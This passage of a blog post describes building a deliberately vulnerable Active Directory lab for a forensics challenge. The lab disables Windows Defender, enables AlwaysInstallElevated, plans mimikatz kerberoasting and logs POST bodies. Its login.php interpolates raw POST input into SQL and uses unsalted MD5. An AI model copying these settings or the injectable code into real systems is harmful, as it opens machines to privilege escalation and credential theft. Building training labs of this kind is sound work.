                       <span style="color:#f92672">&#34;name&#34;</span>:  <span style="color:#e6db74">&#34;Lawyer&#34;</span>
                   },
                   {
                       <span style="color:#f92672">&#34;name&#34;</span>:  <span style="color:#e6db74">&#34;Developers&#34;</span>
                   },
                   {
                       <span style="color:#f92672">&#34;name&#34;</span>:  <span style="color:#e6db74">&#34;Student&#34;</span>
                   },
                   {
                       <span style="color:#f92672">&#34;name&#34;</span>:  <span style="color:#e6db74">&#34;Employees&#34;</span>
                   }
               ]
}
</code></pre></div><p>Basically, the PowerShell script will take the users and groups from the JSON file and create the groups and users based on the values that was set, this includes but not limited to the name, password and whether it has a description or not, <em><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong>wink wink</strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></em> and whether it is kerberoastable or not.</p>
<br>

<h3 id="group-policies">Group Policies</h3>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-17.png" alt="depression"></p>
<p>So, you got a working Active Directory environment, but do you know how to make it vulnerable? Well, as an amateur sysadmin, of course I don’t! So, let’s run down what the plan was for the challenge.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-18.png" alt="picasso"></p>
<p>Now, looking at the <em>picasso</em> looking image above here:</p>
<ol>
<li>The attacker or <strong>the intern</strong> (also the name of the challenge) will have credentials to the first workstation.</li>
<li>This workstation will have multiple users logged on to it (as fluff)</li>
<li>Also, this workstation will allow <strong><strong><strong><strong><strong><strong><strong><strong>everyone</strong></strong></strong></strong></strong></strong></strong></strong> to install applications on it as Administrator</li>
<li>Then using <code>mimikatz</code>, the attacker will use <strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong>kerberoasting</strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong> to pivot to the 2nd workstation</li>
<li>The 2nd workstation only allows developers to logon to it</li>
<li>The 2nd workstation will also have a web server that leads to a web portal</li>
<li>The web server will be using XAMPP</li>
<li>The web server will also have POST request logging</li>
</ol>
<br>

<h4 id="disabling-windows-defender">Disabling Windows Defender</h4>
<p>So first things first in any Windows based lab environment, <strong>disable Windows Defender</strong>. But how do you do that in an Active Directory environment? For an amateur lab builder, I had to experiment in many different ways for 2-3 days until I realised I was using the wrong kind of Windows. But i resolved the issue after looking at <a href="https://bohansec.medium.com/how-to-set-up-an-ad-attack-lab-part-one-493571ebb603">BohanSec&rsquo;s Kerberoasting Lab</a>.</p>
<blockquote>
<p><em>In John Hammond’s video, he wanted to build an Active Directory environment with Windows Server 2022 and Windows 11 Enterprise, which as mentioned before, group policies can’t be applied to workstations to disable Windows Defender if they are using Windows 10 above build 1809.</em></p>
</blockquote>
<br>

<p>So with the <strong>cough cough</strong> right version of Windows, let’s disable Windows Defender with group policies.</p>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-19.png" alt="searching-for-group-policy-management"></p>
<p>Within the domain controller, search for <code>Group Policy Management</code>.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-20.png" alt="creating-a-group-policy"></p>
<p>Then, open up the tree until you see the domain name of the environment. Right click it and select <code>Create a GPO in this domain, and Link it here</code>.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-21.png" alt="naming-group-policy"></p>
<p>Name your policy whatever you like it to be but because this is my test environment, I’ll do this whenever I need a new group policy. So, I’ll name it <code>Disable Windows Defender</code>.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-22.png" alt="editing-group-policy"></p>
<p>A new item will be displayed, just right click it and select <code>Edit</code>.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-23.png" alt="navigating-to-group-policy"></p>
<p>Right here is where you would configure the policies for users and computers in the domain. To disable Windows Defender, navigate to this directory:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-powershell" data-lang="powershell">Computer Configuration -&gt; Policies -&gt; Administrative Templates -&gt; Windows Components -&gt; Windows Defender Antivirus
</code></pre></div><p>Double click on <code>Turn off Windows Defender Antivirus</code>.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-24.png" alt="default-configuration"></p>
<p>By default, it is not configured.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-25.png" alt="turning-off-windows-defender"></p>
<p>So, to configure it, click on <code>Disabled</code> → <code>Apply</code> → <code>Ok</code></p>
<br>

<h4 id="alwaysinstallelevated">AlwaysInstallElevated</h4>
<p>Alright! Now that Windows Defender has been defeated, let’s make privilege escalation possible for the workstations shall we? So erm… what kind of privilege escalation vector shall I implement? Well at the time, I had trouble thinking about that too until I remembered most companies will not allow their employees to install applications by themselves as it requires Administrator privileges. With that in mind, let’s be an irresponsible sysadmin and let everyone install some applications by themselves.</p>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-26.png" alt="huhhh"></p>
<p>To do that, we will be using the <code>AlwaysInstallElevated</code> privilege. This privilege, when enabled, allows any user on the system to install Microsoft Windows Installer Package Files (MSI files) with system-level privileges. In essence, it provides the installer with the highest level of access rights on the system, akin to what an administrator would have. This can be particularly useful in scenarios where users need to install software without being hindered by restricted permissions.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-27.png" alt="navigating-to-group-policy"></p>
<p>Going through the same process before, navigate here:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-powershell" data-lang="powershell">User Configuration -&gt; Policies -&gt; Administrative Templates -&gt; Windows Components -&gt; Windows Installer
</code></pre></div><br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-28.png" alt="enabling-group-policy"></p>
<p>Then, you know what to do here.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-29.png" alt="same-thing-diff-location"></p>
<p>Furthermore, you need to do this in:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-powershell" data-lang="powershell">Computer Configuration -&gt; Policies -&gt; Administrative Templates -&gt; Windows Components -&gt; Windows Installer
</code></pre></div><p>In addition to that, you need to enable <code>Allow user control over installs</code></p>
<br>

<h4 id="logon-to">Logon To</h4>
<p>Now that users are able to install applications as the Administrator, which makes privilege escalation possible. How do we make pivoting a bit harder for red teamers? Well, we make the 2nd workstation accessible to only one user, the service account <code>http_svc</code>.</p>
<blockquote>
<p><em>I’m going to write a method which is tedious and stupid, but ideally I should’ve done it by scripting it out according to this <a href="https://woshub.com/restrict-workstation-logon-ad-users/">source</a>. But, I’m too lazy so I’m gonna put that as a future improvement lol</em></p>
</blockquote>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-30.png" alt="going-to-users-and-computers"></p>
<p>Go to <code>Active Directory Users and Computers</code> and into the <code>Users</code> within the domain name.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-31.png" alt="going-to-logon-to"></p>
<p>Click on every <del>bloody</del> user’s properties and navigate to <code>Account</code> → <code>Log On To</code>.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-32.png" alt="set-computers-to-logon"></p>
<p>Finally, set the user to be able to log into the specific workstation.</p>
<p>Basically, I had to do this for every user created from the script mentioned… pretty stupid as I’m a person who prefers scripting but eh meh I was rushing this challenge (which no one solved anyways T^T). Anyways, all of the users will only be allowed to access WS01, but only the service account is allowed to access all workstations including WS02.</p>
<br>

<h3 id="creating-workstation-1">Creating Workstation 1</h3>
<p>Alright! We have a vulnerable domain controller with users and groups! So, now let’s create the environment for the workstations!</p>
<blockquote>
<p><em>Just want to point out, it took like 4-5 days to reach here from my experimentation. From here on out, it’s pretty easy as most of the group policies did all the work for us!</em></p>
</blockquote>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-33.png" alt="muahahahah"></p>
<br>

<h4 id="group-policy-sanity-check">Group Policy Sanity Check</h4>
<p>So, for a sanity check let’s check if our group policies work.</p>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-34.png" alt="defender-down"></p>
<p>Going to Windows Security, we can see that Windows Defender is controlled by our domain controller. This means that our group policy to disable Windows Defender works as intended!</p>
<br>

<p>The next verification is a little red teaming-ish. By querying this registry key:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-powershell" data-lang="powershell">reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
</code></pre></div><p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-35.png" alt="alwaysinstallelevated-up"></p>
<p>we can see that the user has the privilege <code>AlwaysInstallElevated</code>, meaning our group policy to enable <code>AlwaysInstallElevated</code> for all users works as well!</p>
<br>

<h4 id="enabling-powershell-logging">Enabling PowerShell Logging</h4>
<p>Now that we verified that the group policies work, let’s get on with other aspects of the environment. Referring to our <strong><strong><strong><strong>picasso</strong></strong></strong></strong> image from earlier, we want to run <code>mimikatz</code> on the machine. However, how do we as blue teamers track the execution of PowerShell scripts? We turn on the logs for PowerShell.</p>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-36.png" alt="searching-local-group-policy"></p>
<p>Let’s edit the local group policies in the workstation by searching <code>gpedit</code>.</p>
<br>

<p>Same like the domain controller, navigate to the following policy:</p>
<pre tabindex="0"><code>Computer Configuration -&gt; Administrative Templates -&gt; Windows Components -&gt; Windows Powershell
</code></pre><p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-37.png" alt="enabling-module-logging-policy"></p>
<p>Turn on <code>Module Logging</code> and set the contents to be everything by entering <code>*</code> into <code>Show Contents</code>.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-38.png" alt="enabling-powershell-block-logging"></p>
<p>Next, turn on <code>PowerShell Script Block Logging</code>.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-39.png" alt="enabling-powershell-transcription"></p>
<p>Lastly, turn on PowerShell Transcription.</p>
<blockquote>
<p><em>For the challenge, I logged into several domain accounts to create fluff for the challenge. Furthermore, other artifacts are created for fluff as well such as notes and work files. However, you place anything you want.</em></p>
</blockquote>
<br>

<h3 id="creating-workstation-2">Creating Workstation 2</h3>
<h4 id="changing-the-computer-name">Changing the Computer Name</h4>
<p>So for the 2nd workstation, we’ll be referring to <a href="https://onecloudemoji.github.io/labbing/pivoting-and-kerberoast-lab-setup/">James Hay’s Kerberoasting Lab</a>. First of all, as I cloned a base for the workstations, the computer name will be the same. So, let’s change that!</p>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-40.png" alt="going-to-system-properties"></p>
<p>Just head to this page through the Control Panel.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-41.png" alt="computer-name-not-changed"></p>
<p>Change the computer name to something different.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-42.png" alt="new-computer-name"></p>
<p>Since, I’m a forgetful person I tend to leave the default DESKTOP-XXXXXXX on the first workstation so let’s just ignore that and follow that format.</p>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-43.png" alt="whistling"></p>
<br>

<h4 id="installing-needed-applications">Installing Needed Applications</h4>
<p>After changing the computer name and joining the workstation to the domain, login as <code>http_svc</code>.</p>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-44.png" alt="logging-in-as-service-acc"></p>
<p>For my case, I set my network adapter for the environment to <code>Host-Only</code> so for downloading any applications I’ll download it on my host and rely on VMWare magic to drag and drop it into the workstation. So, for our case, we’ll download Chrome and XAMPP.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-45.png" alt="enter-admin-credentials"></p>
<p>When installing the applications, it will prompt for the Administrator’s username and password. Do that since we’re building the environment and not actually performing red teaming on the environment.</p>
<br>

<h4 id="turning-on-post-request-logging">Turning on POST Request Logging</h4>
<p>Since I want the participants to do a little more of log analysis, I want a web server with a login page with POST request logging enabled so that every value of the client’s POST requests will be captured.</p>
<blockquote>
<p><em>I don’t know if the content of the client is captured in a real environment if this is enabled with https but if the web server does capture their client’s data in real life, there might be some legal consequences.</em></p>
</blockquote>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-46.png" alt="xampp-control-panel"></p>
<p>After installing Chrome and XAMPP, launch the Control Panel for XAMPP.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-47.png" alt="going-to-httpd.conf"></p>
<p>Click on <code>Config</code> → <code>Apache (httpd.conf)</code></p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-48.png" alt="uncomment-module"></p>
<p>Search for this module and uncomment it by removing the <code>#</code></p>
<pre tabindex="0"><code>LoadModule dumpio_module modules/mod_dumpio.so
</code></pre><br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-49.png" alt="code-block-added"></p>
<p>At the very end of the file, just add this code block in</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-xml" data-lang="xml"><span style="color:#f92672">&lt;IfModule</span> <span style="color:#960050;background-color:#1e0010">dumpio_module</span><span style="color:#f92672">&gt;</span>
  DumpIOInput On
  DumpIOOutput On
  LogLevel warn dumpio:trace7
<span style="color:#f92672">&lt;/IfModule&gt;</span>
</code></pre></div><p>The steps taken here are basically to load the logging function in Apache and enabling it.</p>
<br>

<h4 id="creating-a-webpage">Creating a Webpage</h4>
<p>Thanks to ChatGPT, it generated code for the webpage we’re going to use. Nothing fancy, just a simple login page.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html"><span style="color:#75715e">&lt;!DOCTYPE html&gt;</span>
&lt;<span style="color:#f92672">html</span>&gt;
&lt;<span style="color:#f92672">head</span>&gt;
    &lt;<span style="color:#f92672">title</span>&gt;Login&lt;/<span style="color:#f92672">title</span>&gt;
    &lt;<span style="color:#f92672">link</span> <span style="color:#a6e22e">rel</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;stylesheet&#34;</span> <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text/css&#34;</span> <span style="color:#a6e22e">href</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;style.css&#34;</span>&gt;
&lt;/<span style="color:#f92672">head</span>&gt;
&lt;<span style="color:#f92672">body</span>&gt;
    &lt;<span style="color:#f92672">form</span> <span style="color:#a6e22e">action</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;login.php&#34;</span><span style="color:#a6e22e">method</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;post&#34;</span>&gt;
        &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;login-container&#34;</span>&gt;
            &lt;<span style="color:#f92672">label</span> <span style="color:#a6e22e">for</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;username&#34;</span>&gt;Username:&lt;/<span style="color:#f92672">label</span>&gt;
            &lt;<span style="color:#f92672">input</span> <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text&#34;</span> <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;username&#34;</span> <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;username&#34;</span> <span style="color:#a6e22e">required</span>&gt;

            &lt;<span style="color:#f92672">label</span> <span style="color:#a6e22e">for</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;password&#34;</span>&gt;Password:&lt;/<span style="color:#f92672">label</span>&gt;
            &lt;<span style="color:#f92672">input</span> <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;password&#34;</span> <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;password&#34;</span> <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;password&#34;</span> <span style="color:#a6e22e">required</span>&gt;

            &lt;<span style="color:#f92672">button</span> <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;submit&#34;</span>&gt;Login&lt;/<span style="color:#f92672">button</span>&gt;
        &lt;/<span style="color:#f92672">div</span>&gt;
    &lt;/<span style="color:#f92672">form</span>&gt;
&lt;/<span style="color:#f92672">body</span>&gt;
&lt;/<span style="color:#f92672">html</span>&gt;
</code></pre></div><p>login.html</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-css" data-lang="css"><span style="color:#f92672">body</span> {
    <span style="color:#66d9ef">background-color</span>: <span style="color:#ae81ff">#1a1a1a</span>;
    <span style="color:#66d9ef">color</span>: <span style="color:#66d9ef">white</span>;
    <span style="color:#66d9ef">font-family</span>: Arial, <span style="color:#66d9ef">sans-serif</span>;
}

.<span style="color:#a6e22e">login-container</span> {
    <span style="color:#66d9ef">width</span>: <span style="color:#ae81ff">400</span><span style="color:#66d9ef">px</span>;
    <span style="color:#66d9ef">margin</span>: <span style="color:#66d9ef">auto</span>;
    <span style="color:#66d9ef">padding</span>: <span style="color:#ae81ff">20</span><span style="color:#66d9ef">px</span>;
    <span style="color:#66d9ef">background-color</span>: <span style="color:#ae81ff">#333</span>;
    <span style="color:#66d9ef">border-radius</span>: <span style="color:#ae81ff">5</span><span style="color:#66d9ef">px</span>;
    <span style="color:#66d9ef">box-shadow</span>: <span style="color:#ae81ff">0</span> <span style="color:#ae81ff">0</span> <span style="color:#ae81ff">10</span><span style="color:#66d9ef">px</span> rgba(<span style="color:#ae81ff">0</span>, <span style="color:#ae81ff">0</span>, <span style="color:#ae81ff">0</span>, <span style="color:#ae81ff">0.5</span>);
}

<span style="color:#f92672">input</span><span style="color:#f92672">[</span><span style="color:#f92672">type</span><span style="color:#f92672">=</span><span style="color:#f92672">text</span><span style="color:#f92672">],</span> <span style="color:#f92672">input</span><span style="color:#f92672">[</span><span style="color:#f92672">type</span><span style="color:#f92672">=</span><span style="color:#f92672">password</span><span style="color:#f92672">]</span> {
    <span style="color:#66d9ef">width</span>: <span style="color:#ae81ff">95</span><span style="color:#66d9ef">%</span>;
    <span style="color:#66d9ef">padding</span>: <span style="color:#ae81ff">10</span><span style="color:#66d9ef">px</span>;
    <span style="color:#66d9ef">margin</span>: <span style="color:#ae81ff">8</span><span style="color:#66d9ef">px</span> <span style="color:#ae81ff">0</span>;
    <span style="color:#66d9ef">display</span>: <span style="color:#66d9ef">inline-block</span>;
    <span style="color:#66d9ef">border</span>: <span style="color:#66d9ef">none</span>;
    <span style="color:#66d9ef">background-color</span>: <span style="color:#ae81ff">#555</span>;
    <span style="color:#66d9ef">color</span>: <span style="color:#66d9ef">white</span>;
}

<span style="color:#f92672">button</span> {
    <span style="color:#66d9ef">background-color</span>: <span style="color:#ae81ff">#4CAF50</span>;
    <span style="color:#66d9ef">color</span>: <span style="color:#66d9ef">white</span>;
    <span style="color:#66d9ef">padding</span>: <span style="color:#ae81ff">10</span><span style="color:#66d9ef">px</span> <span style="color:#ae81ff">20</span><span style="color:#66d9ef">px</span>;
    <span style="color:#66d9ef">margin</span>: <span style="color:#ae81ff">8</span><span style="color:#66d9ef">px</span> <span style="color:#ae81ff">0</span>;
    <span style="color:#66d9ef">border</span>: <span style="color:#66d9ef">none</span>;
    <span style="color:#66d9ef">cursor</span>: <span style="color:#66d9ef">pointer</span>;
    <span style="color:#66d9ef">width</span>: <span style="color:#ae81ff">100</span><span style="color:#66d9ef">%</span>;
}

<span style="color:#f92672">button</span>:<span style="color:#a6e22e">hover</span> {
    <span style="color:#66d9ef">opacity</span>: <span style="color:#ae81ff">0.8</span>;
}

<span style="color:#f92672">label</span> {
    <span style="color:#66d9ef">margin-bottom</span>: <span style="color:#ae81ff">5</span><span style="color:#66d9ef">px</span>;
    <span style="color:#66d9ef">display</span>: <span style="color:#66d9ef">block</span>;
}
</code></pre></div><p>style.css</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-php" data-lang="php"><span style="color:#f92672">&lt;?</span><span style="color:#a6e22e">php</span>

<span style="color:#a6e22e">ini_set</span>(<span style="color:#e6db74">&#39;display_errors&#39;</span>, <span style="color:#ae81ff">1</span>);
<span style="color:#a6e22e">ini_set</span>(<span style="color:#e6db74">&#39;display_startup_errors&#39;</span>, <span style="color:#ae81ff">1</span>);
<span style="color:#a6e22e">error_reporting</span>(<span style="color:#66d9ef">E_ALL</span>);

<span style="color:#a6e22e">session_start</span>();

$host <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;localhost&#39;</span>; <span style="color:#75715e">// replace with your database host
</span><span style="color:#75715e"></span>$dbname <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;Users&#39;</span>; <span style="color:#75715e">// replace with your database name
</span><span style="color:#75715e"></span>$username <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;root&#39;</span>; <span style="color:#75715e">// replace with your database username
</span><span style="color:#75715e"></span>$password <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;&#39;</span>; <span style="color:#75715e">// replace with your database password
</span><span style="color:#75715e"></span>
<span style="color:#75715e">// Create connection
</span><span style="color:#75715e"></span>$conn <span style="color:#f92672">=</span> <span style="color:#a6e22e">mysqli_connect</span>($host, $username, $password, $dbname);

<span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>$conn) {
    <span style="color:#66d9ef">die</span>(<span style="color:#e6db74">&#34;Connection failed: &#34;</span> <span style="color:#f92672">.</span> <span style="color:#a6e22e">mysqli_connect_error</span>());
}

<span style="color:#66d9ef">if</span> ($_SERVER[<span style="color:#e6db74">&#34;REQUEST_METHOD&#34;</span>] <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;POST&#34;</span>) {
    $inputUsername <span style="color:#f92672">=</span> $_POST[<span style="color:#e6db74">&#39;username&#39;</span>];
    $inputPassword <span style="color:#f92672">=</span> <span style="color:#a6e22e">md5</span>($_POST[<span style="color:#e6db74">&#39;password&#39;</span>]); <span style="color:#75715e">// Hashing the input password with MD5
</span><span style="color:#75715e"></span>    
    $query <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;SELECT username, password FROM users WHERE username = &#39;</span><span style="color:#e6db74">$inputUsername</span><span style="color:#e6db74">&#39; AND password = &#39;</span><span style="color:#e6db74">$inputPassword</span><span style="color:#e6db74">&#39;&#34;</span>;

    $result <span style="color:#f92672">=</span> <span style="color:#a6e22e">mysqli_query</span>($conn, $query);
    <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>$result) {
        <span style="color:#66d9ef">echo</span> <span style="color:#e6db74">&#34;Error executing query: &#34;</span> <span style="color:#f92672">.</span> <span style="color:#a6e22e">mysqli_error</span>($conn);
        <span style="color:#66d9ef">exit</span>;
    }
    
        
    <span style="color:#66d9ef">if</span> ($result <span style="color:#f92672">=</span> <span style="color:#a6e22e">mysqli_query</span>($conn, $query)) {
        <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">mysqli_num_rows</span>($result) <span style="color:#f92672">&gt;=</span> <span style="color:#ae81ff">1</span>) {
            <span style="color:#75715e">// Login successful
</span><span style="color:#75715e"></span>            $_SESSION[<span style="color:#e6db74">&#39;user&#39;</span>] <span style="color:#f92672">=</span> $inputUsername;
            <span style="color:#a6e22e">header</span>(<span style="color:#e6db74">&#34;Location: welcome.html&#34;</span>); <span style="color:#75715e">// redirect to welcome page
</span><span style="color:#75715e"></span>            <span style="color:#66d9ef">exit</span>();
        } <span style="color:#66d9ef">else</span> {
            <span style="color:#66d9ef">echo</span> <span style="color:#e6db74">&#34;Invalid username or password.&#34;</span>;
        }
    } <span style="color:#66d9ef">else</span> {
        <span style="color:#66d9ef">echo</span> <span style="color:#e6db74">&#34;Error executing query: &#34;</span> <span style="color:#f92672">.</span> <span style="color:#a6e22e">mysqli_error</span>($conn);
    }
}
<span style="color:#75715e">?&gt;</span><span style="color:#960050;background-color:#1e0010">
</span></code></pre></div><p>login.php</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"><span style="color:#66d9ef">CREATE</span> <span style="color:#66d9ef">TABLE</span> users (
    id INT AUTO_INCREMENT <span style="color:#66d9ef">PRIMARY</span> <span style="color:#66d9ef">KEY</span>,
    username VARCHAR(<span style="color:#ae81ff">50</span>) <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span> <span style="color:#66d9ef">UNIQUE</span>,
    password VARCHAR(<span style="color:#ae81ff">255</span>) <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span>
);
</code></pre></div><br>

<p>For future projects, I might want to do something with the database. For that reason, I’ll just create a database first within phpmyadmin.</p>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-50.png" alt="phpmyadmin-page"></p>
<p>To do that, navigate to <code>http://localhost/phpmyadmin</code> and click on <code>New</code>.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-51.png" alt="new-database"></p>
<p>Name the database to <code>Users</code>.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-52.png" alt="go-to-sql"></p>
<p>Go to the <code>SQL</code> tab.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-53.png" alt="executed-code-block"></p>
<p>Enter the code block given and click <code>Go</code>.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-54.png" alt="click-on-insert"></p>
<p>Add a user by clicking on <code>Insert</code>.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-55.png" alt="new-user"></p>
<p>Finally, just fill in the username and password, and click <code>Go</code>.</p>
<blockquote>
<p><em>Since our code compares the md5 hash of the password, hash the password first then put in into the input field</em></p>
</blockquote>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-56.png" alt="login-page-sanity-check"></p>
<p>For a sanity check go to <code>http://localhost/login.html</code>. If it works, just follow the developer’s golden rule, <strong>DON’T TOUCH IT</strong>.</p>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-57.png" alt="pray"></p>
<br>

<p>Another sanity check we need to do is the logging feature. We can verify this by logging in as the wrong user and checking the logs in <code>error.log</code>.</p>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-58.png" alt="log-sanity-check"></p>
<br>

<h2 id="creating-evidence">Creating Evidence</h2>
<blockquote>
<p><em>First and foremost, to allow kerberoasting to happen we need <code>http_svc</code> to login to WS01 and logout</em></p>
</blockquote>
<h3 id="initial-access">Initial Access</h3>
<p>So before actually gaining access to the environment, let’s see what the intern knows.</p>
<ol>
<li>He has access to a workstation</li>
<li>He knows that the company allows employees to install Microsoft applications with Administrator rights</li>
<li>He knows that the company has an internal web server</li>
</ol>
<p>So, initials access is… done? Yes it is! So, all we need to do is just privilege escalation!</p>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-59.png" alt="multiple-users-logged-in"></p>
<br>

<p>To create fluff for the challenge, I basically logged in as different users.</p>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-60.png" alt="ipconfig"></p>
<p>For the sake of pivoting with <code>mimikatz</code> I will have to <code>ssh</code> to WS01 from WS02 so that the credentials will be in memory. Just find the IP address of WS01.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-61.png" alt="ssh-connection"></p>
<p>And <code>ssh</code> into it from WS02 with the service account.</p>
<br>

<h3 id="privilege-escalation">Privilege Escalation</h3>
<p>So for privilege escalation, it’s pretty straight forward from here.</p>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-62.png" alt="dab-weeeeeeee"></p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-63.png" alt="logged-in-as-intern"></p>
